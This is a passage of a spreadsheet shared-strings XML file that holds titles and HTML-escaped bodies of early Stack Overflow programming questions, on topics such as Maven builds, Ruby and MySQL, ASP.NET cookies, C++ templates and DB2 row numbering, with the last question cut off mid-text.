  <si>
    <t>What do you think about Microsoft Oslo MGraph?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;MGraph is a great textual data format brought by Microsoft "Oslo".&lt;/p&gt;
&lt;p&gt;Do you think it has a chance to get as broad as XML is today?&lt;/p&gt;
&lt;p&gt;Example (Google Geocode):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{  
  name = "waltrop, lehmstr 1d",  
  Status {  
    code = 200,  
    request: "geocode"  
  },  
  Placemark [  
    {  
      id = "p1",  
      address = "LehmstraÃŸe, 45731 Waltrop, Deutschland",  
      AddressDetails { Country {CountryNameCode = "DE", CountryName = "Deutschland", AdministrativeArea { AdministrativeAreaName = "Nordrhein-Westfalen", SubAdministrativeArea = { SubAdministrativeAreaName = "Recklinghausen", Locality { LocalityName = "Waltrop", Thoroughfare { ThoroughfareName = "LehmstraÃŸe" }, PostalCode = { PostalCodeNumber = "45731" }}}}}, Accuracy = 6 },  
      ExtendedData {  
        LatLonBox {  
          north = 51.6244226,  
          south = 51.6181274,  
          east = 7.4046111,  
          west = 7.3983159  
        }  
      },  
      Point {  
        coordinates [ 7.4013350, 51.6212620, 0 ]  
      }  
    }  
  ]  
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Mode information here: &lt;a href="http://startbigthinksmall.wordpress.com/2008/12/10/mgraph-the-next-xml/" rel="nofollow"&gt;Microsoft "Oslo" MGraph - the next XML?&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Maven install folder structure problem j2ee (spring, struts ..)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i'm using maven 2.1-SNAPSHOT as eclipse plugin.
My project structure is like this:&lt;/p&gt;
&lt;p&gt;src/main/java&lt;br&gt;
&amp;nbsp;&amp;nbsp; -model&lt;br&gt;
&amp;nbsp;&amp;nbsp;  -service&lt;br&gt;
&amp;nbsp;&amp;nbsp;  -action&lt;br&gt;
src/test/java&lt;br&gt;
&amp;nbsp;&amp;nbsp;  empty atm&lt;br&gt;
src/main/resources&lt;br&gt;
&amp;nbsp;&amp;nbsp;  empty atm&lt;br&gt;
src/test/resources&lt;br&gt;
&amp;nbsp;&amp;nbsp;  empty atm&lt;br&gt;
src/main/webapp&lt;br&gt;
&amp;nbsp;&amp;nbsp;  -js&lt;br&gt;
    &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-dojo&lt;br&gt;
&amp;nbsp;&amp;nbsp;  -META-INF&lt;br&gt;
&amp;nbsp;&amp;nbsp;  -WEB-INF&lt;br&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;    web.xml &lt;br&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;    appcontext.xml&lt;br&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;   struts.xml&lt;br&gt;
&amp;nbsp;&amp;nbsp;  index.jsp&lt;/p&gt;
&lt;p&gt;I'm having trouble understanding the build process and where to put which file.
I use as Application Server Jetty but i want to deploy my project on  tomcat as well
(so i have set up in my pom packaging war).&lt;/p&gt;
&lt;p&gt;When i run my project with the maven:install command my target folder looks like this:
myproject.war&lt;br&gt;
war&lt;br&gt;
&amp;nbsp;&amp;nbsp;  not relevant&lt;br&gt;
test-classes&lt;br&gt;
&amp;nbsp;&amp;nbsp;  empty atm&lt;br&gt;
myproject&lt;br&gt;
&amp;nbsp;&amp;nbsp;  js&lt;br&gt;
&amp;nbsp;&amp;nbsp;  META-INF&lt;br&gt;
&amp;nbsp;&amp;nbsp;  WEB-INF&lt;br&gt;
&amp;nbsp;&amp;nbsp;  index.jsp&lt;br&gt;
classes&lt;br&gt;
&amp;nbsp;&amp;nbsp;  model&lt;br&gt;
&amp;nbsp;&amp;nbsp;  service&lt;br&gt;
&amp;nbsp;&amp;nbsp;  action&lt;br&gt;&lt;/p&gt;
&lt;p&gt;My problem is that i need in the classes folder my persistence.xml which i have in META-INF. And struts.xml too i guess. I'm not sure about dojo either if it is right there. And honestly i don't know if this structure is right at all. I also dont know how to configure that the output changes. &lt;/p&gt;
&lt;p&gt;I hope somebody can help me i really want to understand this process how it should be right, maybe there are even nice ressources to lookup to get
better at these things. Thanks in advance kukudas&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Has anyone successfully connected to MySQL from Ruby?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm starting to get a bit desperate in my attempts to get a ruby script to connect to MySQL.&lt;/p&gt;
&lt;p&gt;I've given up on DBI, as I just don't seem to be able to get it to work no matter what I do. I figured I might have more luck with just using mysql.rb from ruby-mysql. However, in using that I get the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;./mysql.rb:453:in `read': Client does not support authentication protocol requested by server; consider upgrading MySQL client (Mysql::Error)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I gather from &lt;a href="http://www.ocsinventory-ng.org/index.php?mact=News,cntnt01,detail,0&amp;amp;cntnt01articleid=3&amp;amp;cntnt01returnid=77" rel="nofollow"&gt;googling that error message&lt;/a&gt; that this means my version of MySQL is too recent and doesn't support old-style passwords. I'm on a shared server and don't have root access, so I can't make the changes recommended to the MySQL config.&lt;/p&gt;
&lt;p&gt;My version, btw, is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mysql  Ver 14.7 Distrib 4.1.22, for pc-linux-gnu (i686) using readline 4.3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Has anyone succeeded in getting ruby to connect to MySQL? I've been trying under Windows, since I have admin access on my Windows machine, but if there's a way to do it without root access on Linux, that'd be even better.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can one access TestContext in an AssemblyCleanup method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Microsoft's UnitTesting namespace (&lt;code&gt;Microsoft.VisualStudio.TestTools.UnitTesting&lt;/code&gt;) there are &lt;code&gt;AssemblyInitialize&lt;/code&gt; and &lt;code&gt;AssemblyCleanup&lt;/code&gt; attributes you can apply to static methods and they will be called before and after all tests respectively.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[AssemblyInitialize]
static public void AssemblyInitialize(TestContext testCtx)
{
    // allocate resources
}
[AssemblyCleanup]
static public void AssemblyCleanup()
{
    // free resources
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My question: is it possible and &lt;em&gt;safe&lt;/em&gt; to access the &lt;code&gt;TestContext&lt;/code&gt; within &lt;code&gt;AssemblyCleanup()&lt;/code&gt;?  If not, is storing resource references as static members a reasonable alternative or could that cause problems as well?&lt;/p&gt;
&lt;p&gt;Additionally/optionally: what is the reasoning behind &lt;em&gt;not&lt;/em&gt; passing a reference to the &lt;code&gt;TestContext&lt;/code&gt; to clean-up methods?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's your ideal C# project built upon?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm starting a new personal project on the side, so this is the first time I'll be able to start from the ground up on a larger project since ASP.NET 2.0 was first released. I'd like this to also be a good learning experience for me, so right now I'm planning on building this upon ASP.NET MVC, Castle ActiveRecord, and Ninject. I'm most comfortable with MbUnit for unit testing and CruiseControl for CI so right now they are the front runners.&lt;/p&gt;
&lt;p&gt;But what would be your first additions once you click "New Solution"? Open Source, commercial, whatever. I have an open mind if they look like they can make it do what it do.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I send users to a different "site" in Apache while also using mod_proxy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web site that I administer that uses Apache 2.0 on the front with Tomcat 6 on the back-end (with mod_proxy proxying the connection between the two).&lt;/p&gt;
&lt;p&gt;I want to be able to use the same VirtualHost to also access the phpMyAdmin application running on the box. So, for example, www.mywebsite.com will pass all traffic to Tomcat, but www.mywebsite.com/myadmin (with obvious security) will pass traffic to phpMyAdmin. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can someone explain this template code that gives me the size of an array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;template&amp;lt;typename T, size_t n&amp;gt;
size_t array_size(const T (&amp;amp;)[n])
{
    return n;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The part that I don't get is the parameters for this template function. What happens with the array when I pass it through there that gives &lt;code&gt;n&lt;/code&gt; as the number of elements in the array?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IronPython Webframework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There seem to be many excellent web frameworks for Python.  Has anyone used any of these (Pylons, Web2Py, Django) with IronPython?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DomainKeys Sendmail DNS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What steps do I have to take to configure my sendmail server to implement domainkeys properly?&lt;/p&gt;
&lt;p&gt;Also what do I have to do on the DNS end?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Read single value from query result</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to return the result that I found in my query to the ASP.net table.  How do I do that?  I already have the query, I am just having trouble getting the count result back.  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string configMan.ConnString["connect"].ToString();
iDB2Conn temp = new iDB2Conn
string query = "select Count(*) as total from test";
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;this is where I am having trouble.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to cope with slow feedback when pair programming?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I work in an Extreme Programming team, pair programming every day. Recently more and more often I get to do stuff that gives slow feedback, on order of 3 minutes. For example: change some thing, recompile, run and see wheather the performance is improved. I see it coroding the quality of pair programming, and I think it affects pairs more that solo programmers. If I am alone I can do sth else, but what if I am pair programming? How would you deal with it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Friend scope in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have three classes, A, B, C. A and B are friends (bidirectionally). Also, B and C are friends (bidirectionally). A has a pointer to B and B has a pointer to C. Why can't A access C's private data through the pointer?&lt;/p&gt;
&lt;p&gt;Just to clarify: This is a pure theoretical C++ language question, not a design advice question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Exclude a column from being sorted using jQuery tablesorter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a way to exclude a single column from being sorted using jQuery's tablesorter plugin. Specifically, I have a fairly large table and would like to keep a "row number" column fixed so that it is easy to see what position in the table a particular row is, after sorting.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#    name
-----------
1    papaya
2    apple
3    strawberry
4    banana
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When sorted on the name column, should result in:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#    name
-----------
1    apple
2    banana
3    papaya
4    strawberry
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make cygwin autocomplete windows paths?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't want to type /cygdrive/c/path/to/stuff, especially when using tools that don't know anything about cygwin. Is there a way to configure cygwin to autocomplete "c:\path\to\stuff" or even "c:/path/to/stuff"?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Type to use to represent a byte in ANSI (C89/90) C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a standards-complaint method to represent a byte in ANSI (C89/90) C? I know that, most often, a char happens to be a byte, but my understanding is that this is not guaranteed to be the case.  Also, there is stdint.h in the C99 standard, but what was used before C99?&lt;/p&gt;
&lt;p&gt;I'm curious about both 8 bits specifically, and a "byte" (sizeof(x) == 1).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java synchronized static methods: lock on object or class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The Java Tutorials say: "it is not possible for two invocations of synchronized methods on the same object to interleave."  &lt;/p&gt;
&lt;p&gt;What does this mean for a &lt;code&gt;static method&lt;/code&gt;?  Since a static method has no associated object, will the synchronized keyword lock on the class, instead of the object?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Oracle: How to create an element in a specific namespace with XMLElement()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Oracle, you can use the &lt;a href="http://download.oracle.com/docs/cd/B28359_01/server.111/b28286/functions230.htm#i1129193" rel="nofollow"&gt;XMLElement()&lt;/a&gt; function to create an element, as in:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XMLElement('name', 'John')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But how to create an element in a specific namespace? For instance, how to create the following element:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;my:name xmlns:my="http://www.example.com/my"&amp;gt;John&amp;lt;/my:name&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Visual Studio designer moving controls and adding grid columns when form is opened</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The first time I try to open a particular form many of the controls (those with anchors on the right side and/or the bottom) are shifted and my grids automatically regain all the columns from their datasource which (the columns) I had previously removed.&lt;/p&gt;
&lt;p&gt;I have read elsewhere it is recommended to copy the 'good' designer code into the constructor after the InitializeComponent method.  This doesn't seem to be a good long term solution, eg what if a user makes future design changes?&lt;/p&gt;
&lt;p&gt;Any suggestions/workarounds? Is this a Visual Studio 2008 bug?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where does Rails store data created by saving activerecord objects during tests?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where does Rails store data created by saving activerecord objects during tests?&lt;/p&gt;
&lt;p&gt;I thought I knew the answer to that question: obviously in the &lt;strong&gt;_test database&lt;/strong&gt;. But it looks like this is &lt;strong&gt;not true&lt;/strong&gt;!&lt;/p&gt;
&lt;p&gt;I used this system to test what's happening to saved ActiveRecord data during rspec tests:&lt;/p&gt;
&lt;p&gt;$ rails -d mysql test&lt;/p&gt;
&lt;p&gt;$ cd test&lt;/p&gt;
&lt;p&gt;$ nano config/database.yml ...&lt;/p&gt;
&lt;p&gt;... create mysql databases test_test, test_development, test_production&lt;/p&gt;
&lt;p&gt;$ script/generate rspec&lt;/p&gt;
&lt;p&gt;$ script/generate rspec_model foo&lt;/p&gt;
&lt;p&gt;edit Foo migration:&lt;/p&gt;
class CreateFoos 
&lt;p&gt;$ rake db:migrate&lt;/p&gt;
&lt;p&gt;edit spec/models/foo_spec.rb:&lt;/p&gt;
&lt;pre&gt;
require File.expand_path(File.dirname(__FILE__) + '/../spec_helper')
describe Foo do
  before(:each) do
    @valid_attributes = {
      :bar =&gt; 12345
    }
  end
  it "should create a new instance given valid attributes" do
    foo = Foo.new(@valid_attributes)
    foo.save
    puts "sleeping..."
    sleep(20)
  end
end
&lt;/pre&gt;
&lt;p&gt;$ rake spec&lt;/p&gt;
&lt;p&gt;When you see "sleeping...", change to another open terminal with a mysql session conneted to the test_test database and do:&lt;/p&gt;
&lt;pre&gt;
mysql&gt; select * from foos;
Empty set (0.00 sec)
&lt;/pre&gt;
&lt;p&gt;Why doesn't the mysql session show any records in the test_test database while the test is running?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>the level of a treeview in WPF?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a WinForms application, the level of a treeview is given by node.level&lt;br /&gt;
What is the corresponding one in WPF?&lt;/p&gt;
&lt;p&gt;Thanks! &lt;/p&gt;
</t>
  </si>
  <si>
    <t>WCF and embedded systems</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a project that involves an embedded system which runs a non-microsoft OS with a C program for the application and am developing .NET software for its end user applications.  For remote configuring with the .NET software (which can go across firewalls), I am considering using WCF.  I know only a little about WCF so far but I've read that it is supposed to be interoperable with environments other than .NET.  The embedded environment has an HTTP stack but no built in support for web services.  Does anyone have any experience with this kind of thing or know if it would be appropriate at all? If so please provide some advice or point me in the right direction.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>i want to find all if statements in C# code which are not followed by brackets. Through regex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to find all &lt;code&gt;if&lt;/code&gt; statements and &lt;code&gt;for&lt;/code&gt; statements which are not followed by curly brackets '&lt;code&gt;{&lt;/code&gt;'. When you write a single line in an &lt;code&gt;if&lt;/code&gt; statement you do not mostly enclose it in curly brackets, so I want to find all those &lt;code&gt;if&lt;/code&gt; and &lt;code&gt;for&lt;/code&gt; statements.&lt;/p&gt;
&lt;p&gt;Please help!&lt;/p&gt;
&lt;p&gt;Like I want to capture this statement&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (childNode.Name == "B")
    return TokenType.Bold;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but not these kinds&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (childNode.Name == "B")
{
    return TokenType.Bold;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to do it with regex.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Monitor a process's network usage?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way in C# or C/C++ &amp;amp; Win32 to monitor a certain process's network usage (Without that application being built by you obviously)? I would like to monitor just 1 process for like an hour or so, then return the bytes used by only that process, such as limewire for example.&lt;/p&gt;
&lt;p&gt;Is it possible? I know netstat -e on windows will tell you total bytes sent/received, but that is for all processes.&lt;/p&gt;
&lt;p&gt;edit: If i can't return just one processes usage, how can i get the bytes sent/received by the entire system? as netstat displays except i just want the integers.&lt;/p&gt;
&lt;p&gt;eg:&lt;/p&gt;
&lt;pre&gt;
netstat -e
                           Received            Sent
Bytes                    2111568926      1133174989
Unicast packets             3016480         2711006
Non-unicast packets            3122            1100
Discards                          0               0
Errors                            0               0
Unknown protocols                 0
&lt;/pre&gt;
&lt;p&gt;I just want to get 2 variables, like rec = 2111568926 and sent = 1133174989&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Delphi fast file copy</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing an app that supposed to copy a bunch of files from one place to another.
When I'm using TFileStream for the copy it is 3-4 times slower than copying the files with the OS.&lt;/p&gt;
&lt;p&gt;I also tried to copy with a buffer, but that was too slow aswell.&lt;/p&gt;
&lt;p&gt;I'm working under Win32, anyone got some insights on this matter?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to create a compeletely transparent window with MFC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create a completely transparent window with MFC, but I don't know how to do this. Can you tell me the way? &lt;/p&gt;
&lt;p&gt;Thank you very much!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>asp.net: moving from session variables to cookies</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My forms are losing session variables on shared hosting very quickly (webhost4life), and I think I want to replace them with cookies. Does the following look reasonable for tracking an ID from form to form:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if(Request.Cookies["currentForm"] == null)
   return;
projectID = new Guid(Request.Cookies["currentForm"]["selectedProjectID"]);
Response.Cookies["currentForm"]["selectedProjectID"] = Request.Cookies["currentForm"]["selectedProjectID"];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note that I am setting the Response cookie in all the forms after I read the Request cookie. Is this necessary? Do the Request cookies copy to the Response automatically?&lt;/p&gt;
&lt;p&gt;I'm setting no properties on the cookies and create them this way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Response.Cookies["currentForm"]["selectedProjectID"] = someGuid.ToString();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The intention is that these are temporary header cookies, not persisted on the client any longer than the browser session. I ask this since I don't often write websites.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What can cause a .NET process/thread to terminate unexpectedly?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to gather a complete listing of the reasons a .NET process or thread to terminate, even though the main() method is guarded by a try...catch clause.&lt;/p&gt;
&lt;p&gt;One such reason is Thread.Abort() (unless you call Thread.ResetAbort). Do you know of more reasons?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tablet PC Autocomplete</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been trying to implement the autocomplete functionality mentioned 
&lt;a href="http://msdn.microsoft.com/en-us/library/ms695043%28VS.85%29.aspx" rel="nofollow"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The problem is I am developing on a windows xp machine and I cant seem to find the right dlls used to develop this feature.&lt;/p&gt;
&lt;p&gt;Using vista for development is not an option, but the production environment is on a Vista Tablet PC. I have downloaded and installed the Tablet PC SDK version 1.7 to no avail (still cant find the libraries).&lt;/p&gt;
&lt;p&gt;The implementation seems to use COM libraries. The examples are all written in C++ and I am developing in .NET.&lt;/p&gt;
&lt;p&gt;Has anyone ever successfully implemented this feature?
If so, how did you go about doing it?&lt;/p&gt;
&lt;p&gt;Any help will be appreciated &lt;/p&gt;
&lt;p&gt;Here is an image showing what I am trying to achieve &lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.msdn.microsoft.com/ms695043.ba59a513-e538-4092-89a6-6d691424dc3d%28en-us,VS.85%29.jpg" alt="alt text" /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Undo in a transactional database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I do not know how to implement undo property of user-friendly interfaces using a transactional database.&lt;/p&gt;
&lt;p&gt;On one hand it is advisable that the user has multilevel (infinite) undoing possibility as it is stated &lt;a href="http://stackoverflow.com/questions/125269/how-would-you-handle-users-who-dont-read-dialog-boxes"&gt;here&lt;/a&gt; in the answer. Patterns that may help in this problem are &lt;a href="http://en.wikipedia.org/wiki/Memento_pattern" rel="nofollow"&gt;Memento&lt;/a&gt;  or &lt;a href="http://en.wikipedia.org/wiki/Command_pattern" rel="nofollow"&gt;Command&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;However, using a complex database including triggers, ever-growing sequence numbers, and uninvertable procedures it is hard to imagine how an undo action may work at different points than transaction boundaries. 
In other words, undo to a point when the transaction committed for the last time is simply a rollback, but how is it possible to go back to different moments?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt; (based on the answers so far): I do not necessarily want that the undo works when the modification is already committed, I would focus on a running application with an open transaction. Whenever the user clicks on save it means a commit, but before save - during the same transaction - the undo should work. I know that using database as a persistent layer is just an implementation detail and the user should not bother with it. But if we think that "The idea of undo in a database and in a GUI are fundamentally different things" and we do not use undo with a database then the infinite undoing is just a buzzword. 
I know that "rollback is ... not a user-undo". &lt;/p&gt;
&lt;p&gt;So how to implement a client-level undo given the "cascading effects as the result of any change" inside the same transaction?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I upgrade PHP 5.1 to 5.2 on SUSE 10.1 using the yast command line only?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I upgrade PHP 5.1 to 5.2 from the SUSE 10.1 command line?  Is there a package manager command to do it automatically?&lt;/p&gt;
&lt;p&gt;Actually I need JSON support to use the JavaScript-RTE and believe it's in PHP 5.2 only.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Improving our dev environment at work</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the near future i will get some 2 weeks for moving and improving our development environment at work.&lt;/p&gt;
&lt;p&gt;We mainly develop one large PHP/MySQL project with 2-10 developers.&lt;/p&gt;
&lt;p&gt;At the moment we have one dev server, running apache with mod_userdir, each dev has a /public_html folder in his (samba-accessible) home.
For VCS and Project Management/Issuetracking we use Subversion and Trac.
Testing/Deployment takes some manual steps, not much automation there.&lt;/p&gt;
&lt;p&gt;My plans for the new setup include the following changes to the existing stuff:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Continuous Integration&lt;/li&gt;
&lt;li&gt;Integrate CI to Trac, create/find a plugin which offers to start actions after success or failure of the build progress (i.e. deploy to staging/live)&lt;/li&gt;
&lt;li&gt;Create automated deployment-scripts (one-click)&lt;/li&gt;
&lt;li&gt;Integrate (&lt;a href="http://www.stack.nl/~dimitri/doxygen/"&gt;Doxygen&lt;/a&gt;)-Documentation into the build-progress and somehow into Trac&lt;/li&gt;
&lt;li&gt;Add &lt;a href="http://stackoverflow.com/questions/438398/subversion-as-version-incrementor-at-each-commit"&gt;automatic versioning&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Add another layer of monitoring (local nagios monitoring our production-system-nagios)&lt;/li&gt;
&lt;li&gt;Add a nightly running MySQL Replication Slave, which can then by the developers be used to test stuff on up2date data&lt;/li&gt;
&lt;li&gt;Review the backup plans&lt;/li&gt;
&lt;li&gt;Document how and why I set everything up in this way&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Do you have any tipps/hints what can be improved further? Anything we should do in a different way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>(ProjectEuler) Sum Combinations</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From &lt;a href="http://projecteuler.net/"&gt;ProjectEuler.net&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Prob 76: How many different ways can one hundred be written as a sum of at least two positive integers?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I have no idea how to start this...any points in the right direction or help? I'm not looking for how to do it but some &lt;strong&gt;hints&lt;/strong&gt; on how to do it.&lt;/p&gt;
&lt;p&gt;For example 5 can be written like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;4 + 1
3 + 2
3 + 1 + 1
2 + 2 + 1
2 + 1 + 1 + 1
1 + 1 + 1 + 1 + 1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So 6 possibilities total.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Deploy PowerBuilder application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to deploy the examples project that comes with PowerBuilder 9 IDE to an .exe file. &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Full build - passed successfully.&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Deploy - fails with the following error:&lt;/p&gt;
&lt;p&gt;"The current library list is different than the library list contained within this project. The project library list has been updated. specify build options for the updated list and try again."&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;How can I overcome this?&lt;/p&gt;
&lt;p&gt;Thanks in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I write a query that outputs the row number as a column?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I write a query that outputs the row number as a column? This is DB2 SQL on an iSeries.&lt;/p&gt;
&lt;p&gt;eg if I have&lt;/p&gt;
&lt;p&gt;table Beatles:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;John
Paul
George
Ringo
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I want to write a statement, without writing a procedure or view if possible, that gives me&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1 John
2 Paul
3 George
4 Ringo
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Open File Dialogue box in JavaScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;how can I get an "open file dialogue" box in JavaScript? ::)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;  &lt;/p&gt;
&lt;p&gt;Duplicate of &lt;a href="http://stackoverflow.com/questions/408735/javascript-file-uploads"&gt;JavaScript file uploads&lt;/a&gt; by the same person.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to unregister an event handler in Internet Explorer 6?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am registering a function with the onload method of a html form, I need to unregister this event hander function on unload of the form. How do I do it in Internet Explorer 6?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is this a bug in string.TrimEnd?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;"\u4000\f".TrimEnd(new char[0])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is equal to &lt;code&gt;"\u4000"&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;I am passing an empty array, so according to the MSDN documentation nothing should be removed and &lt;code&gt;"\u4000\f"&lt;/code&gt; should be returned. Is there a reason for this behaviour?&lt;/p&gt;
&lt;p&gt;EDIT: Clarified expected behaviour&lt;/p&gt;
&lt;p&gt;EDIT: Apparently, this changed in 3.5, I was looking at the 2.0 documentation page.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC application controller constructor problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've created an application controller abstract class that my controllers derive from (As described in the following &lt;a href="http://www.asp.net/Learn/mvc/tutorial-13-cs.aspx" rel="nofollow"&gt;article&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;The following is an example of what my code looks like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public abstract class ApplicationController : Controller
{
    private ProjectDataContext datacontext = new ProjectDataContext();
    protected ProjectDataContext DataContext
    {
        get { return datacontext; }
    }
    public ApplicationController()
    {
        ViewData["OpenTasks"] = DataContext.Tasks.Where(t =&amp;gt; t.UserId == this.UserId).Count();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This produces the following error which i have determined is due to the "Where" lamda expression:&lt;/p&gt;
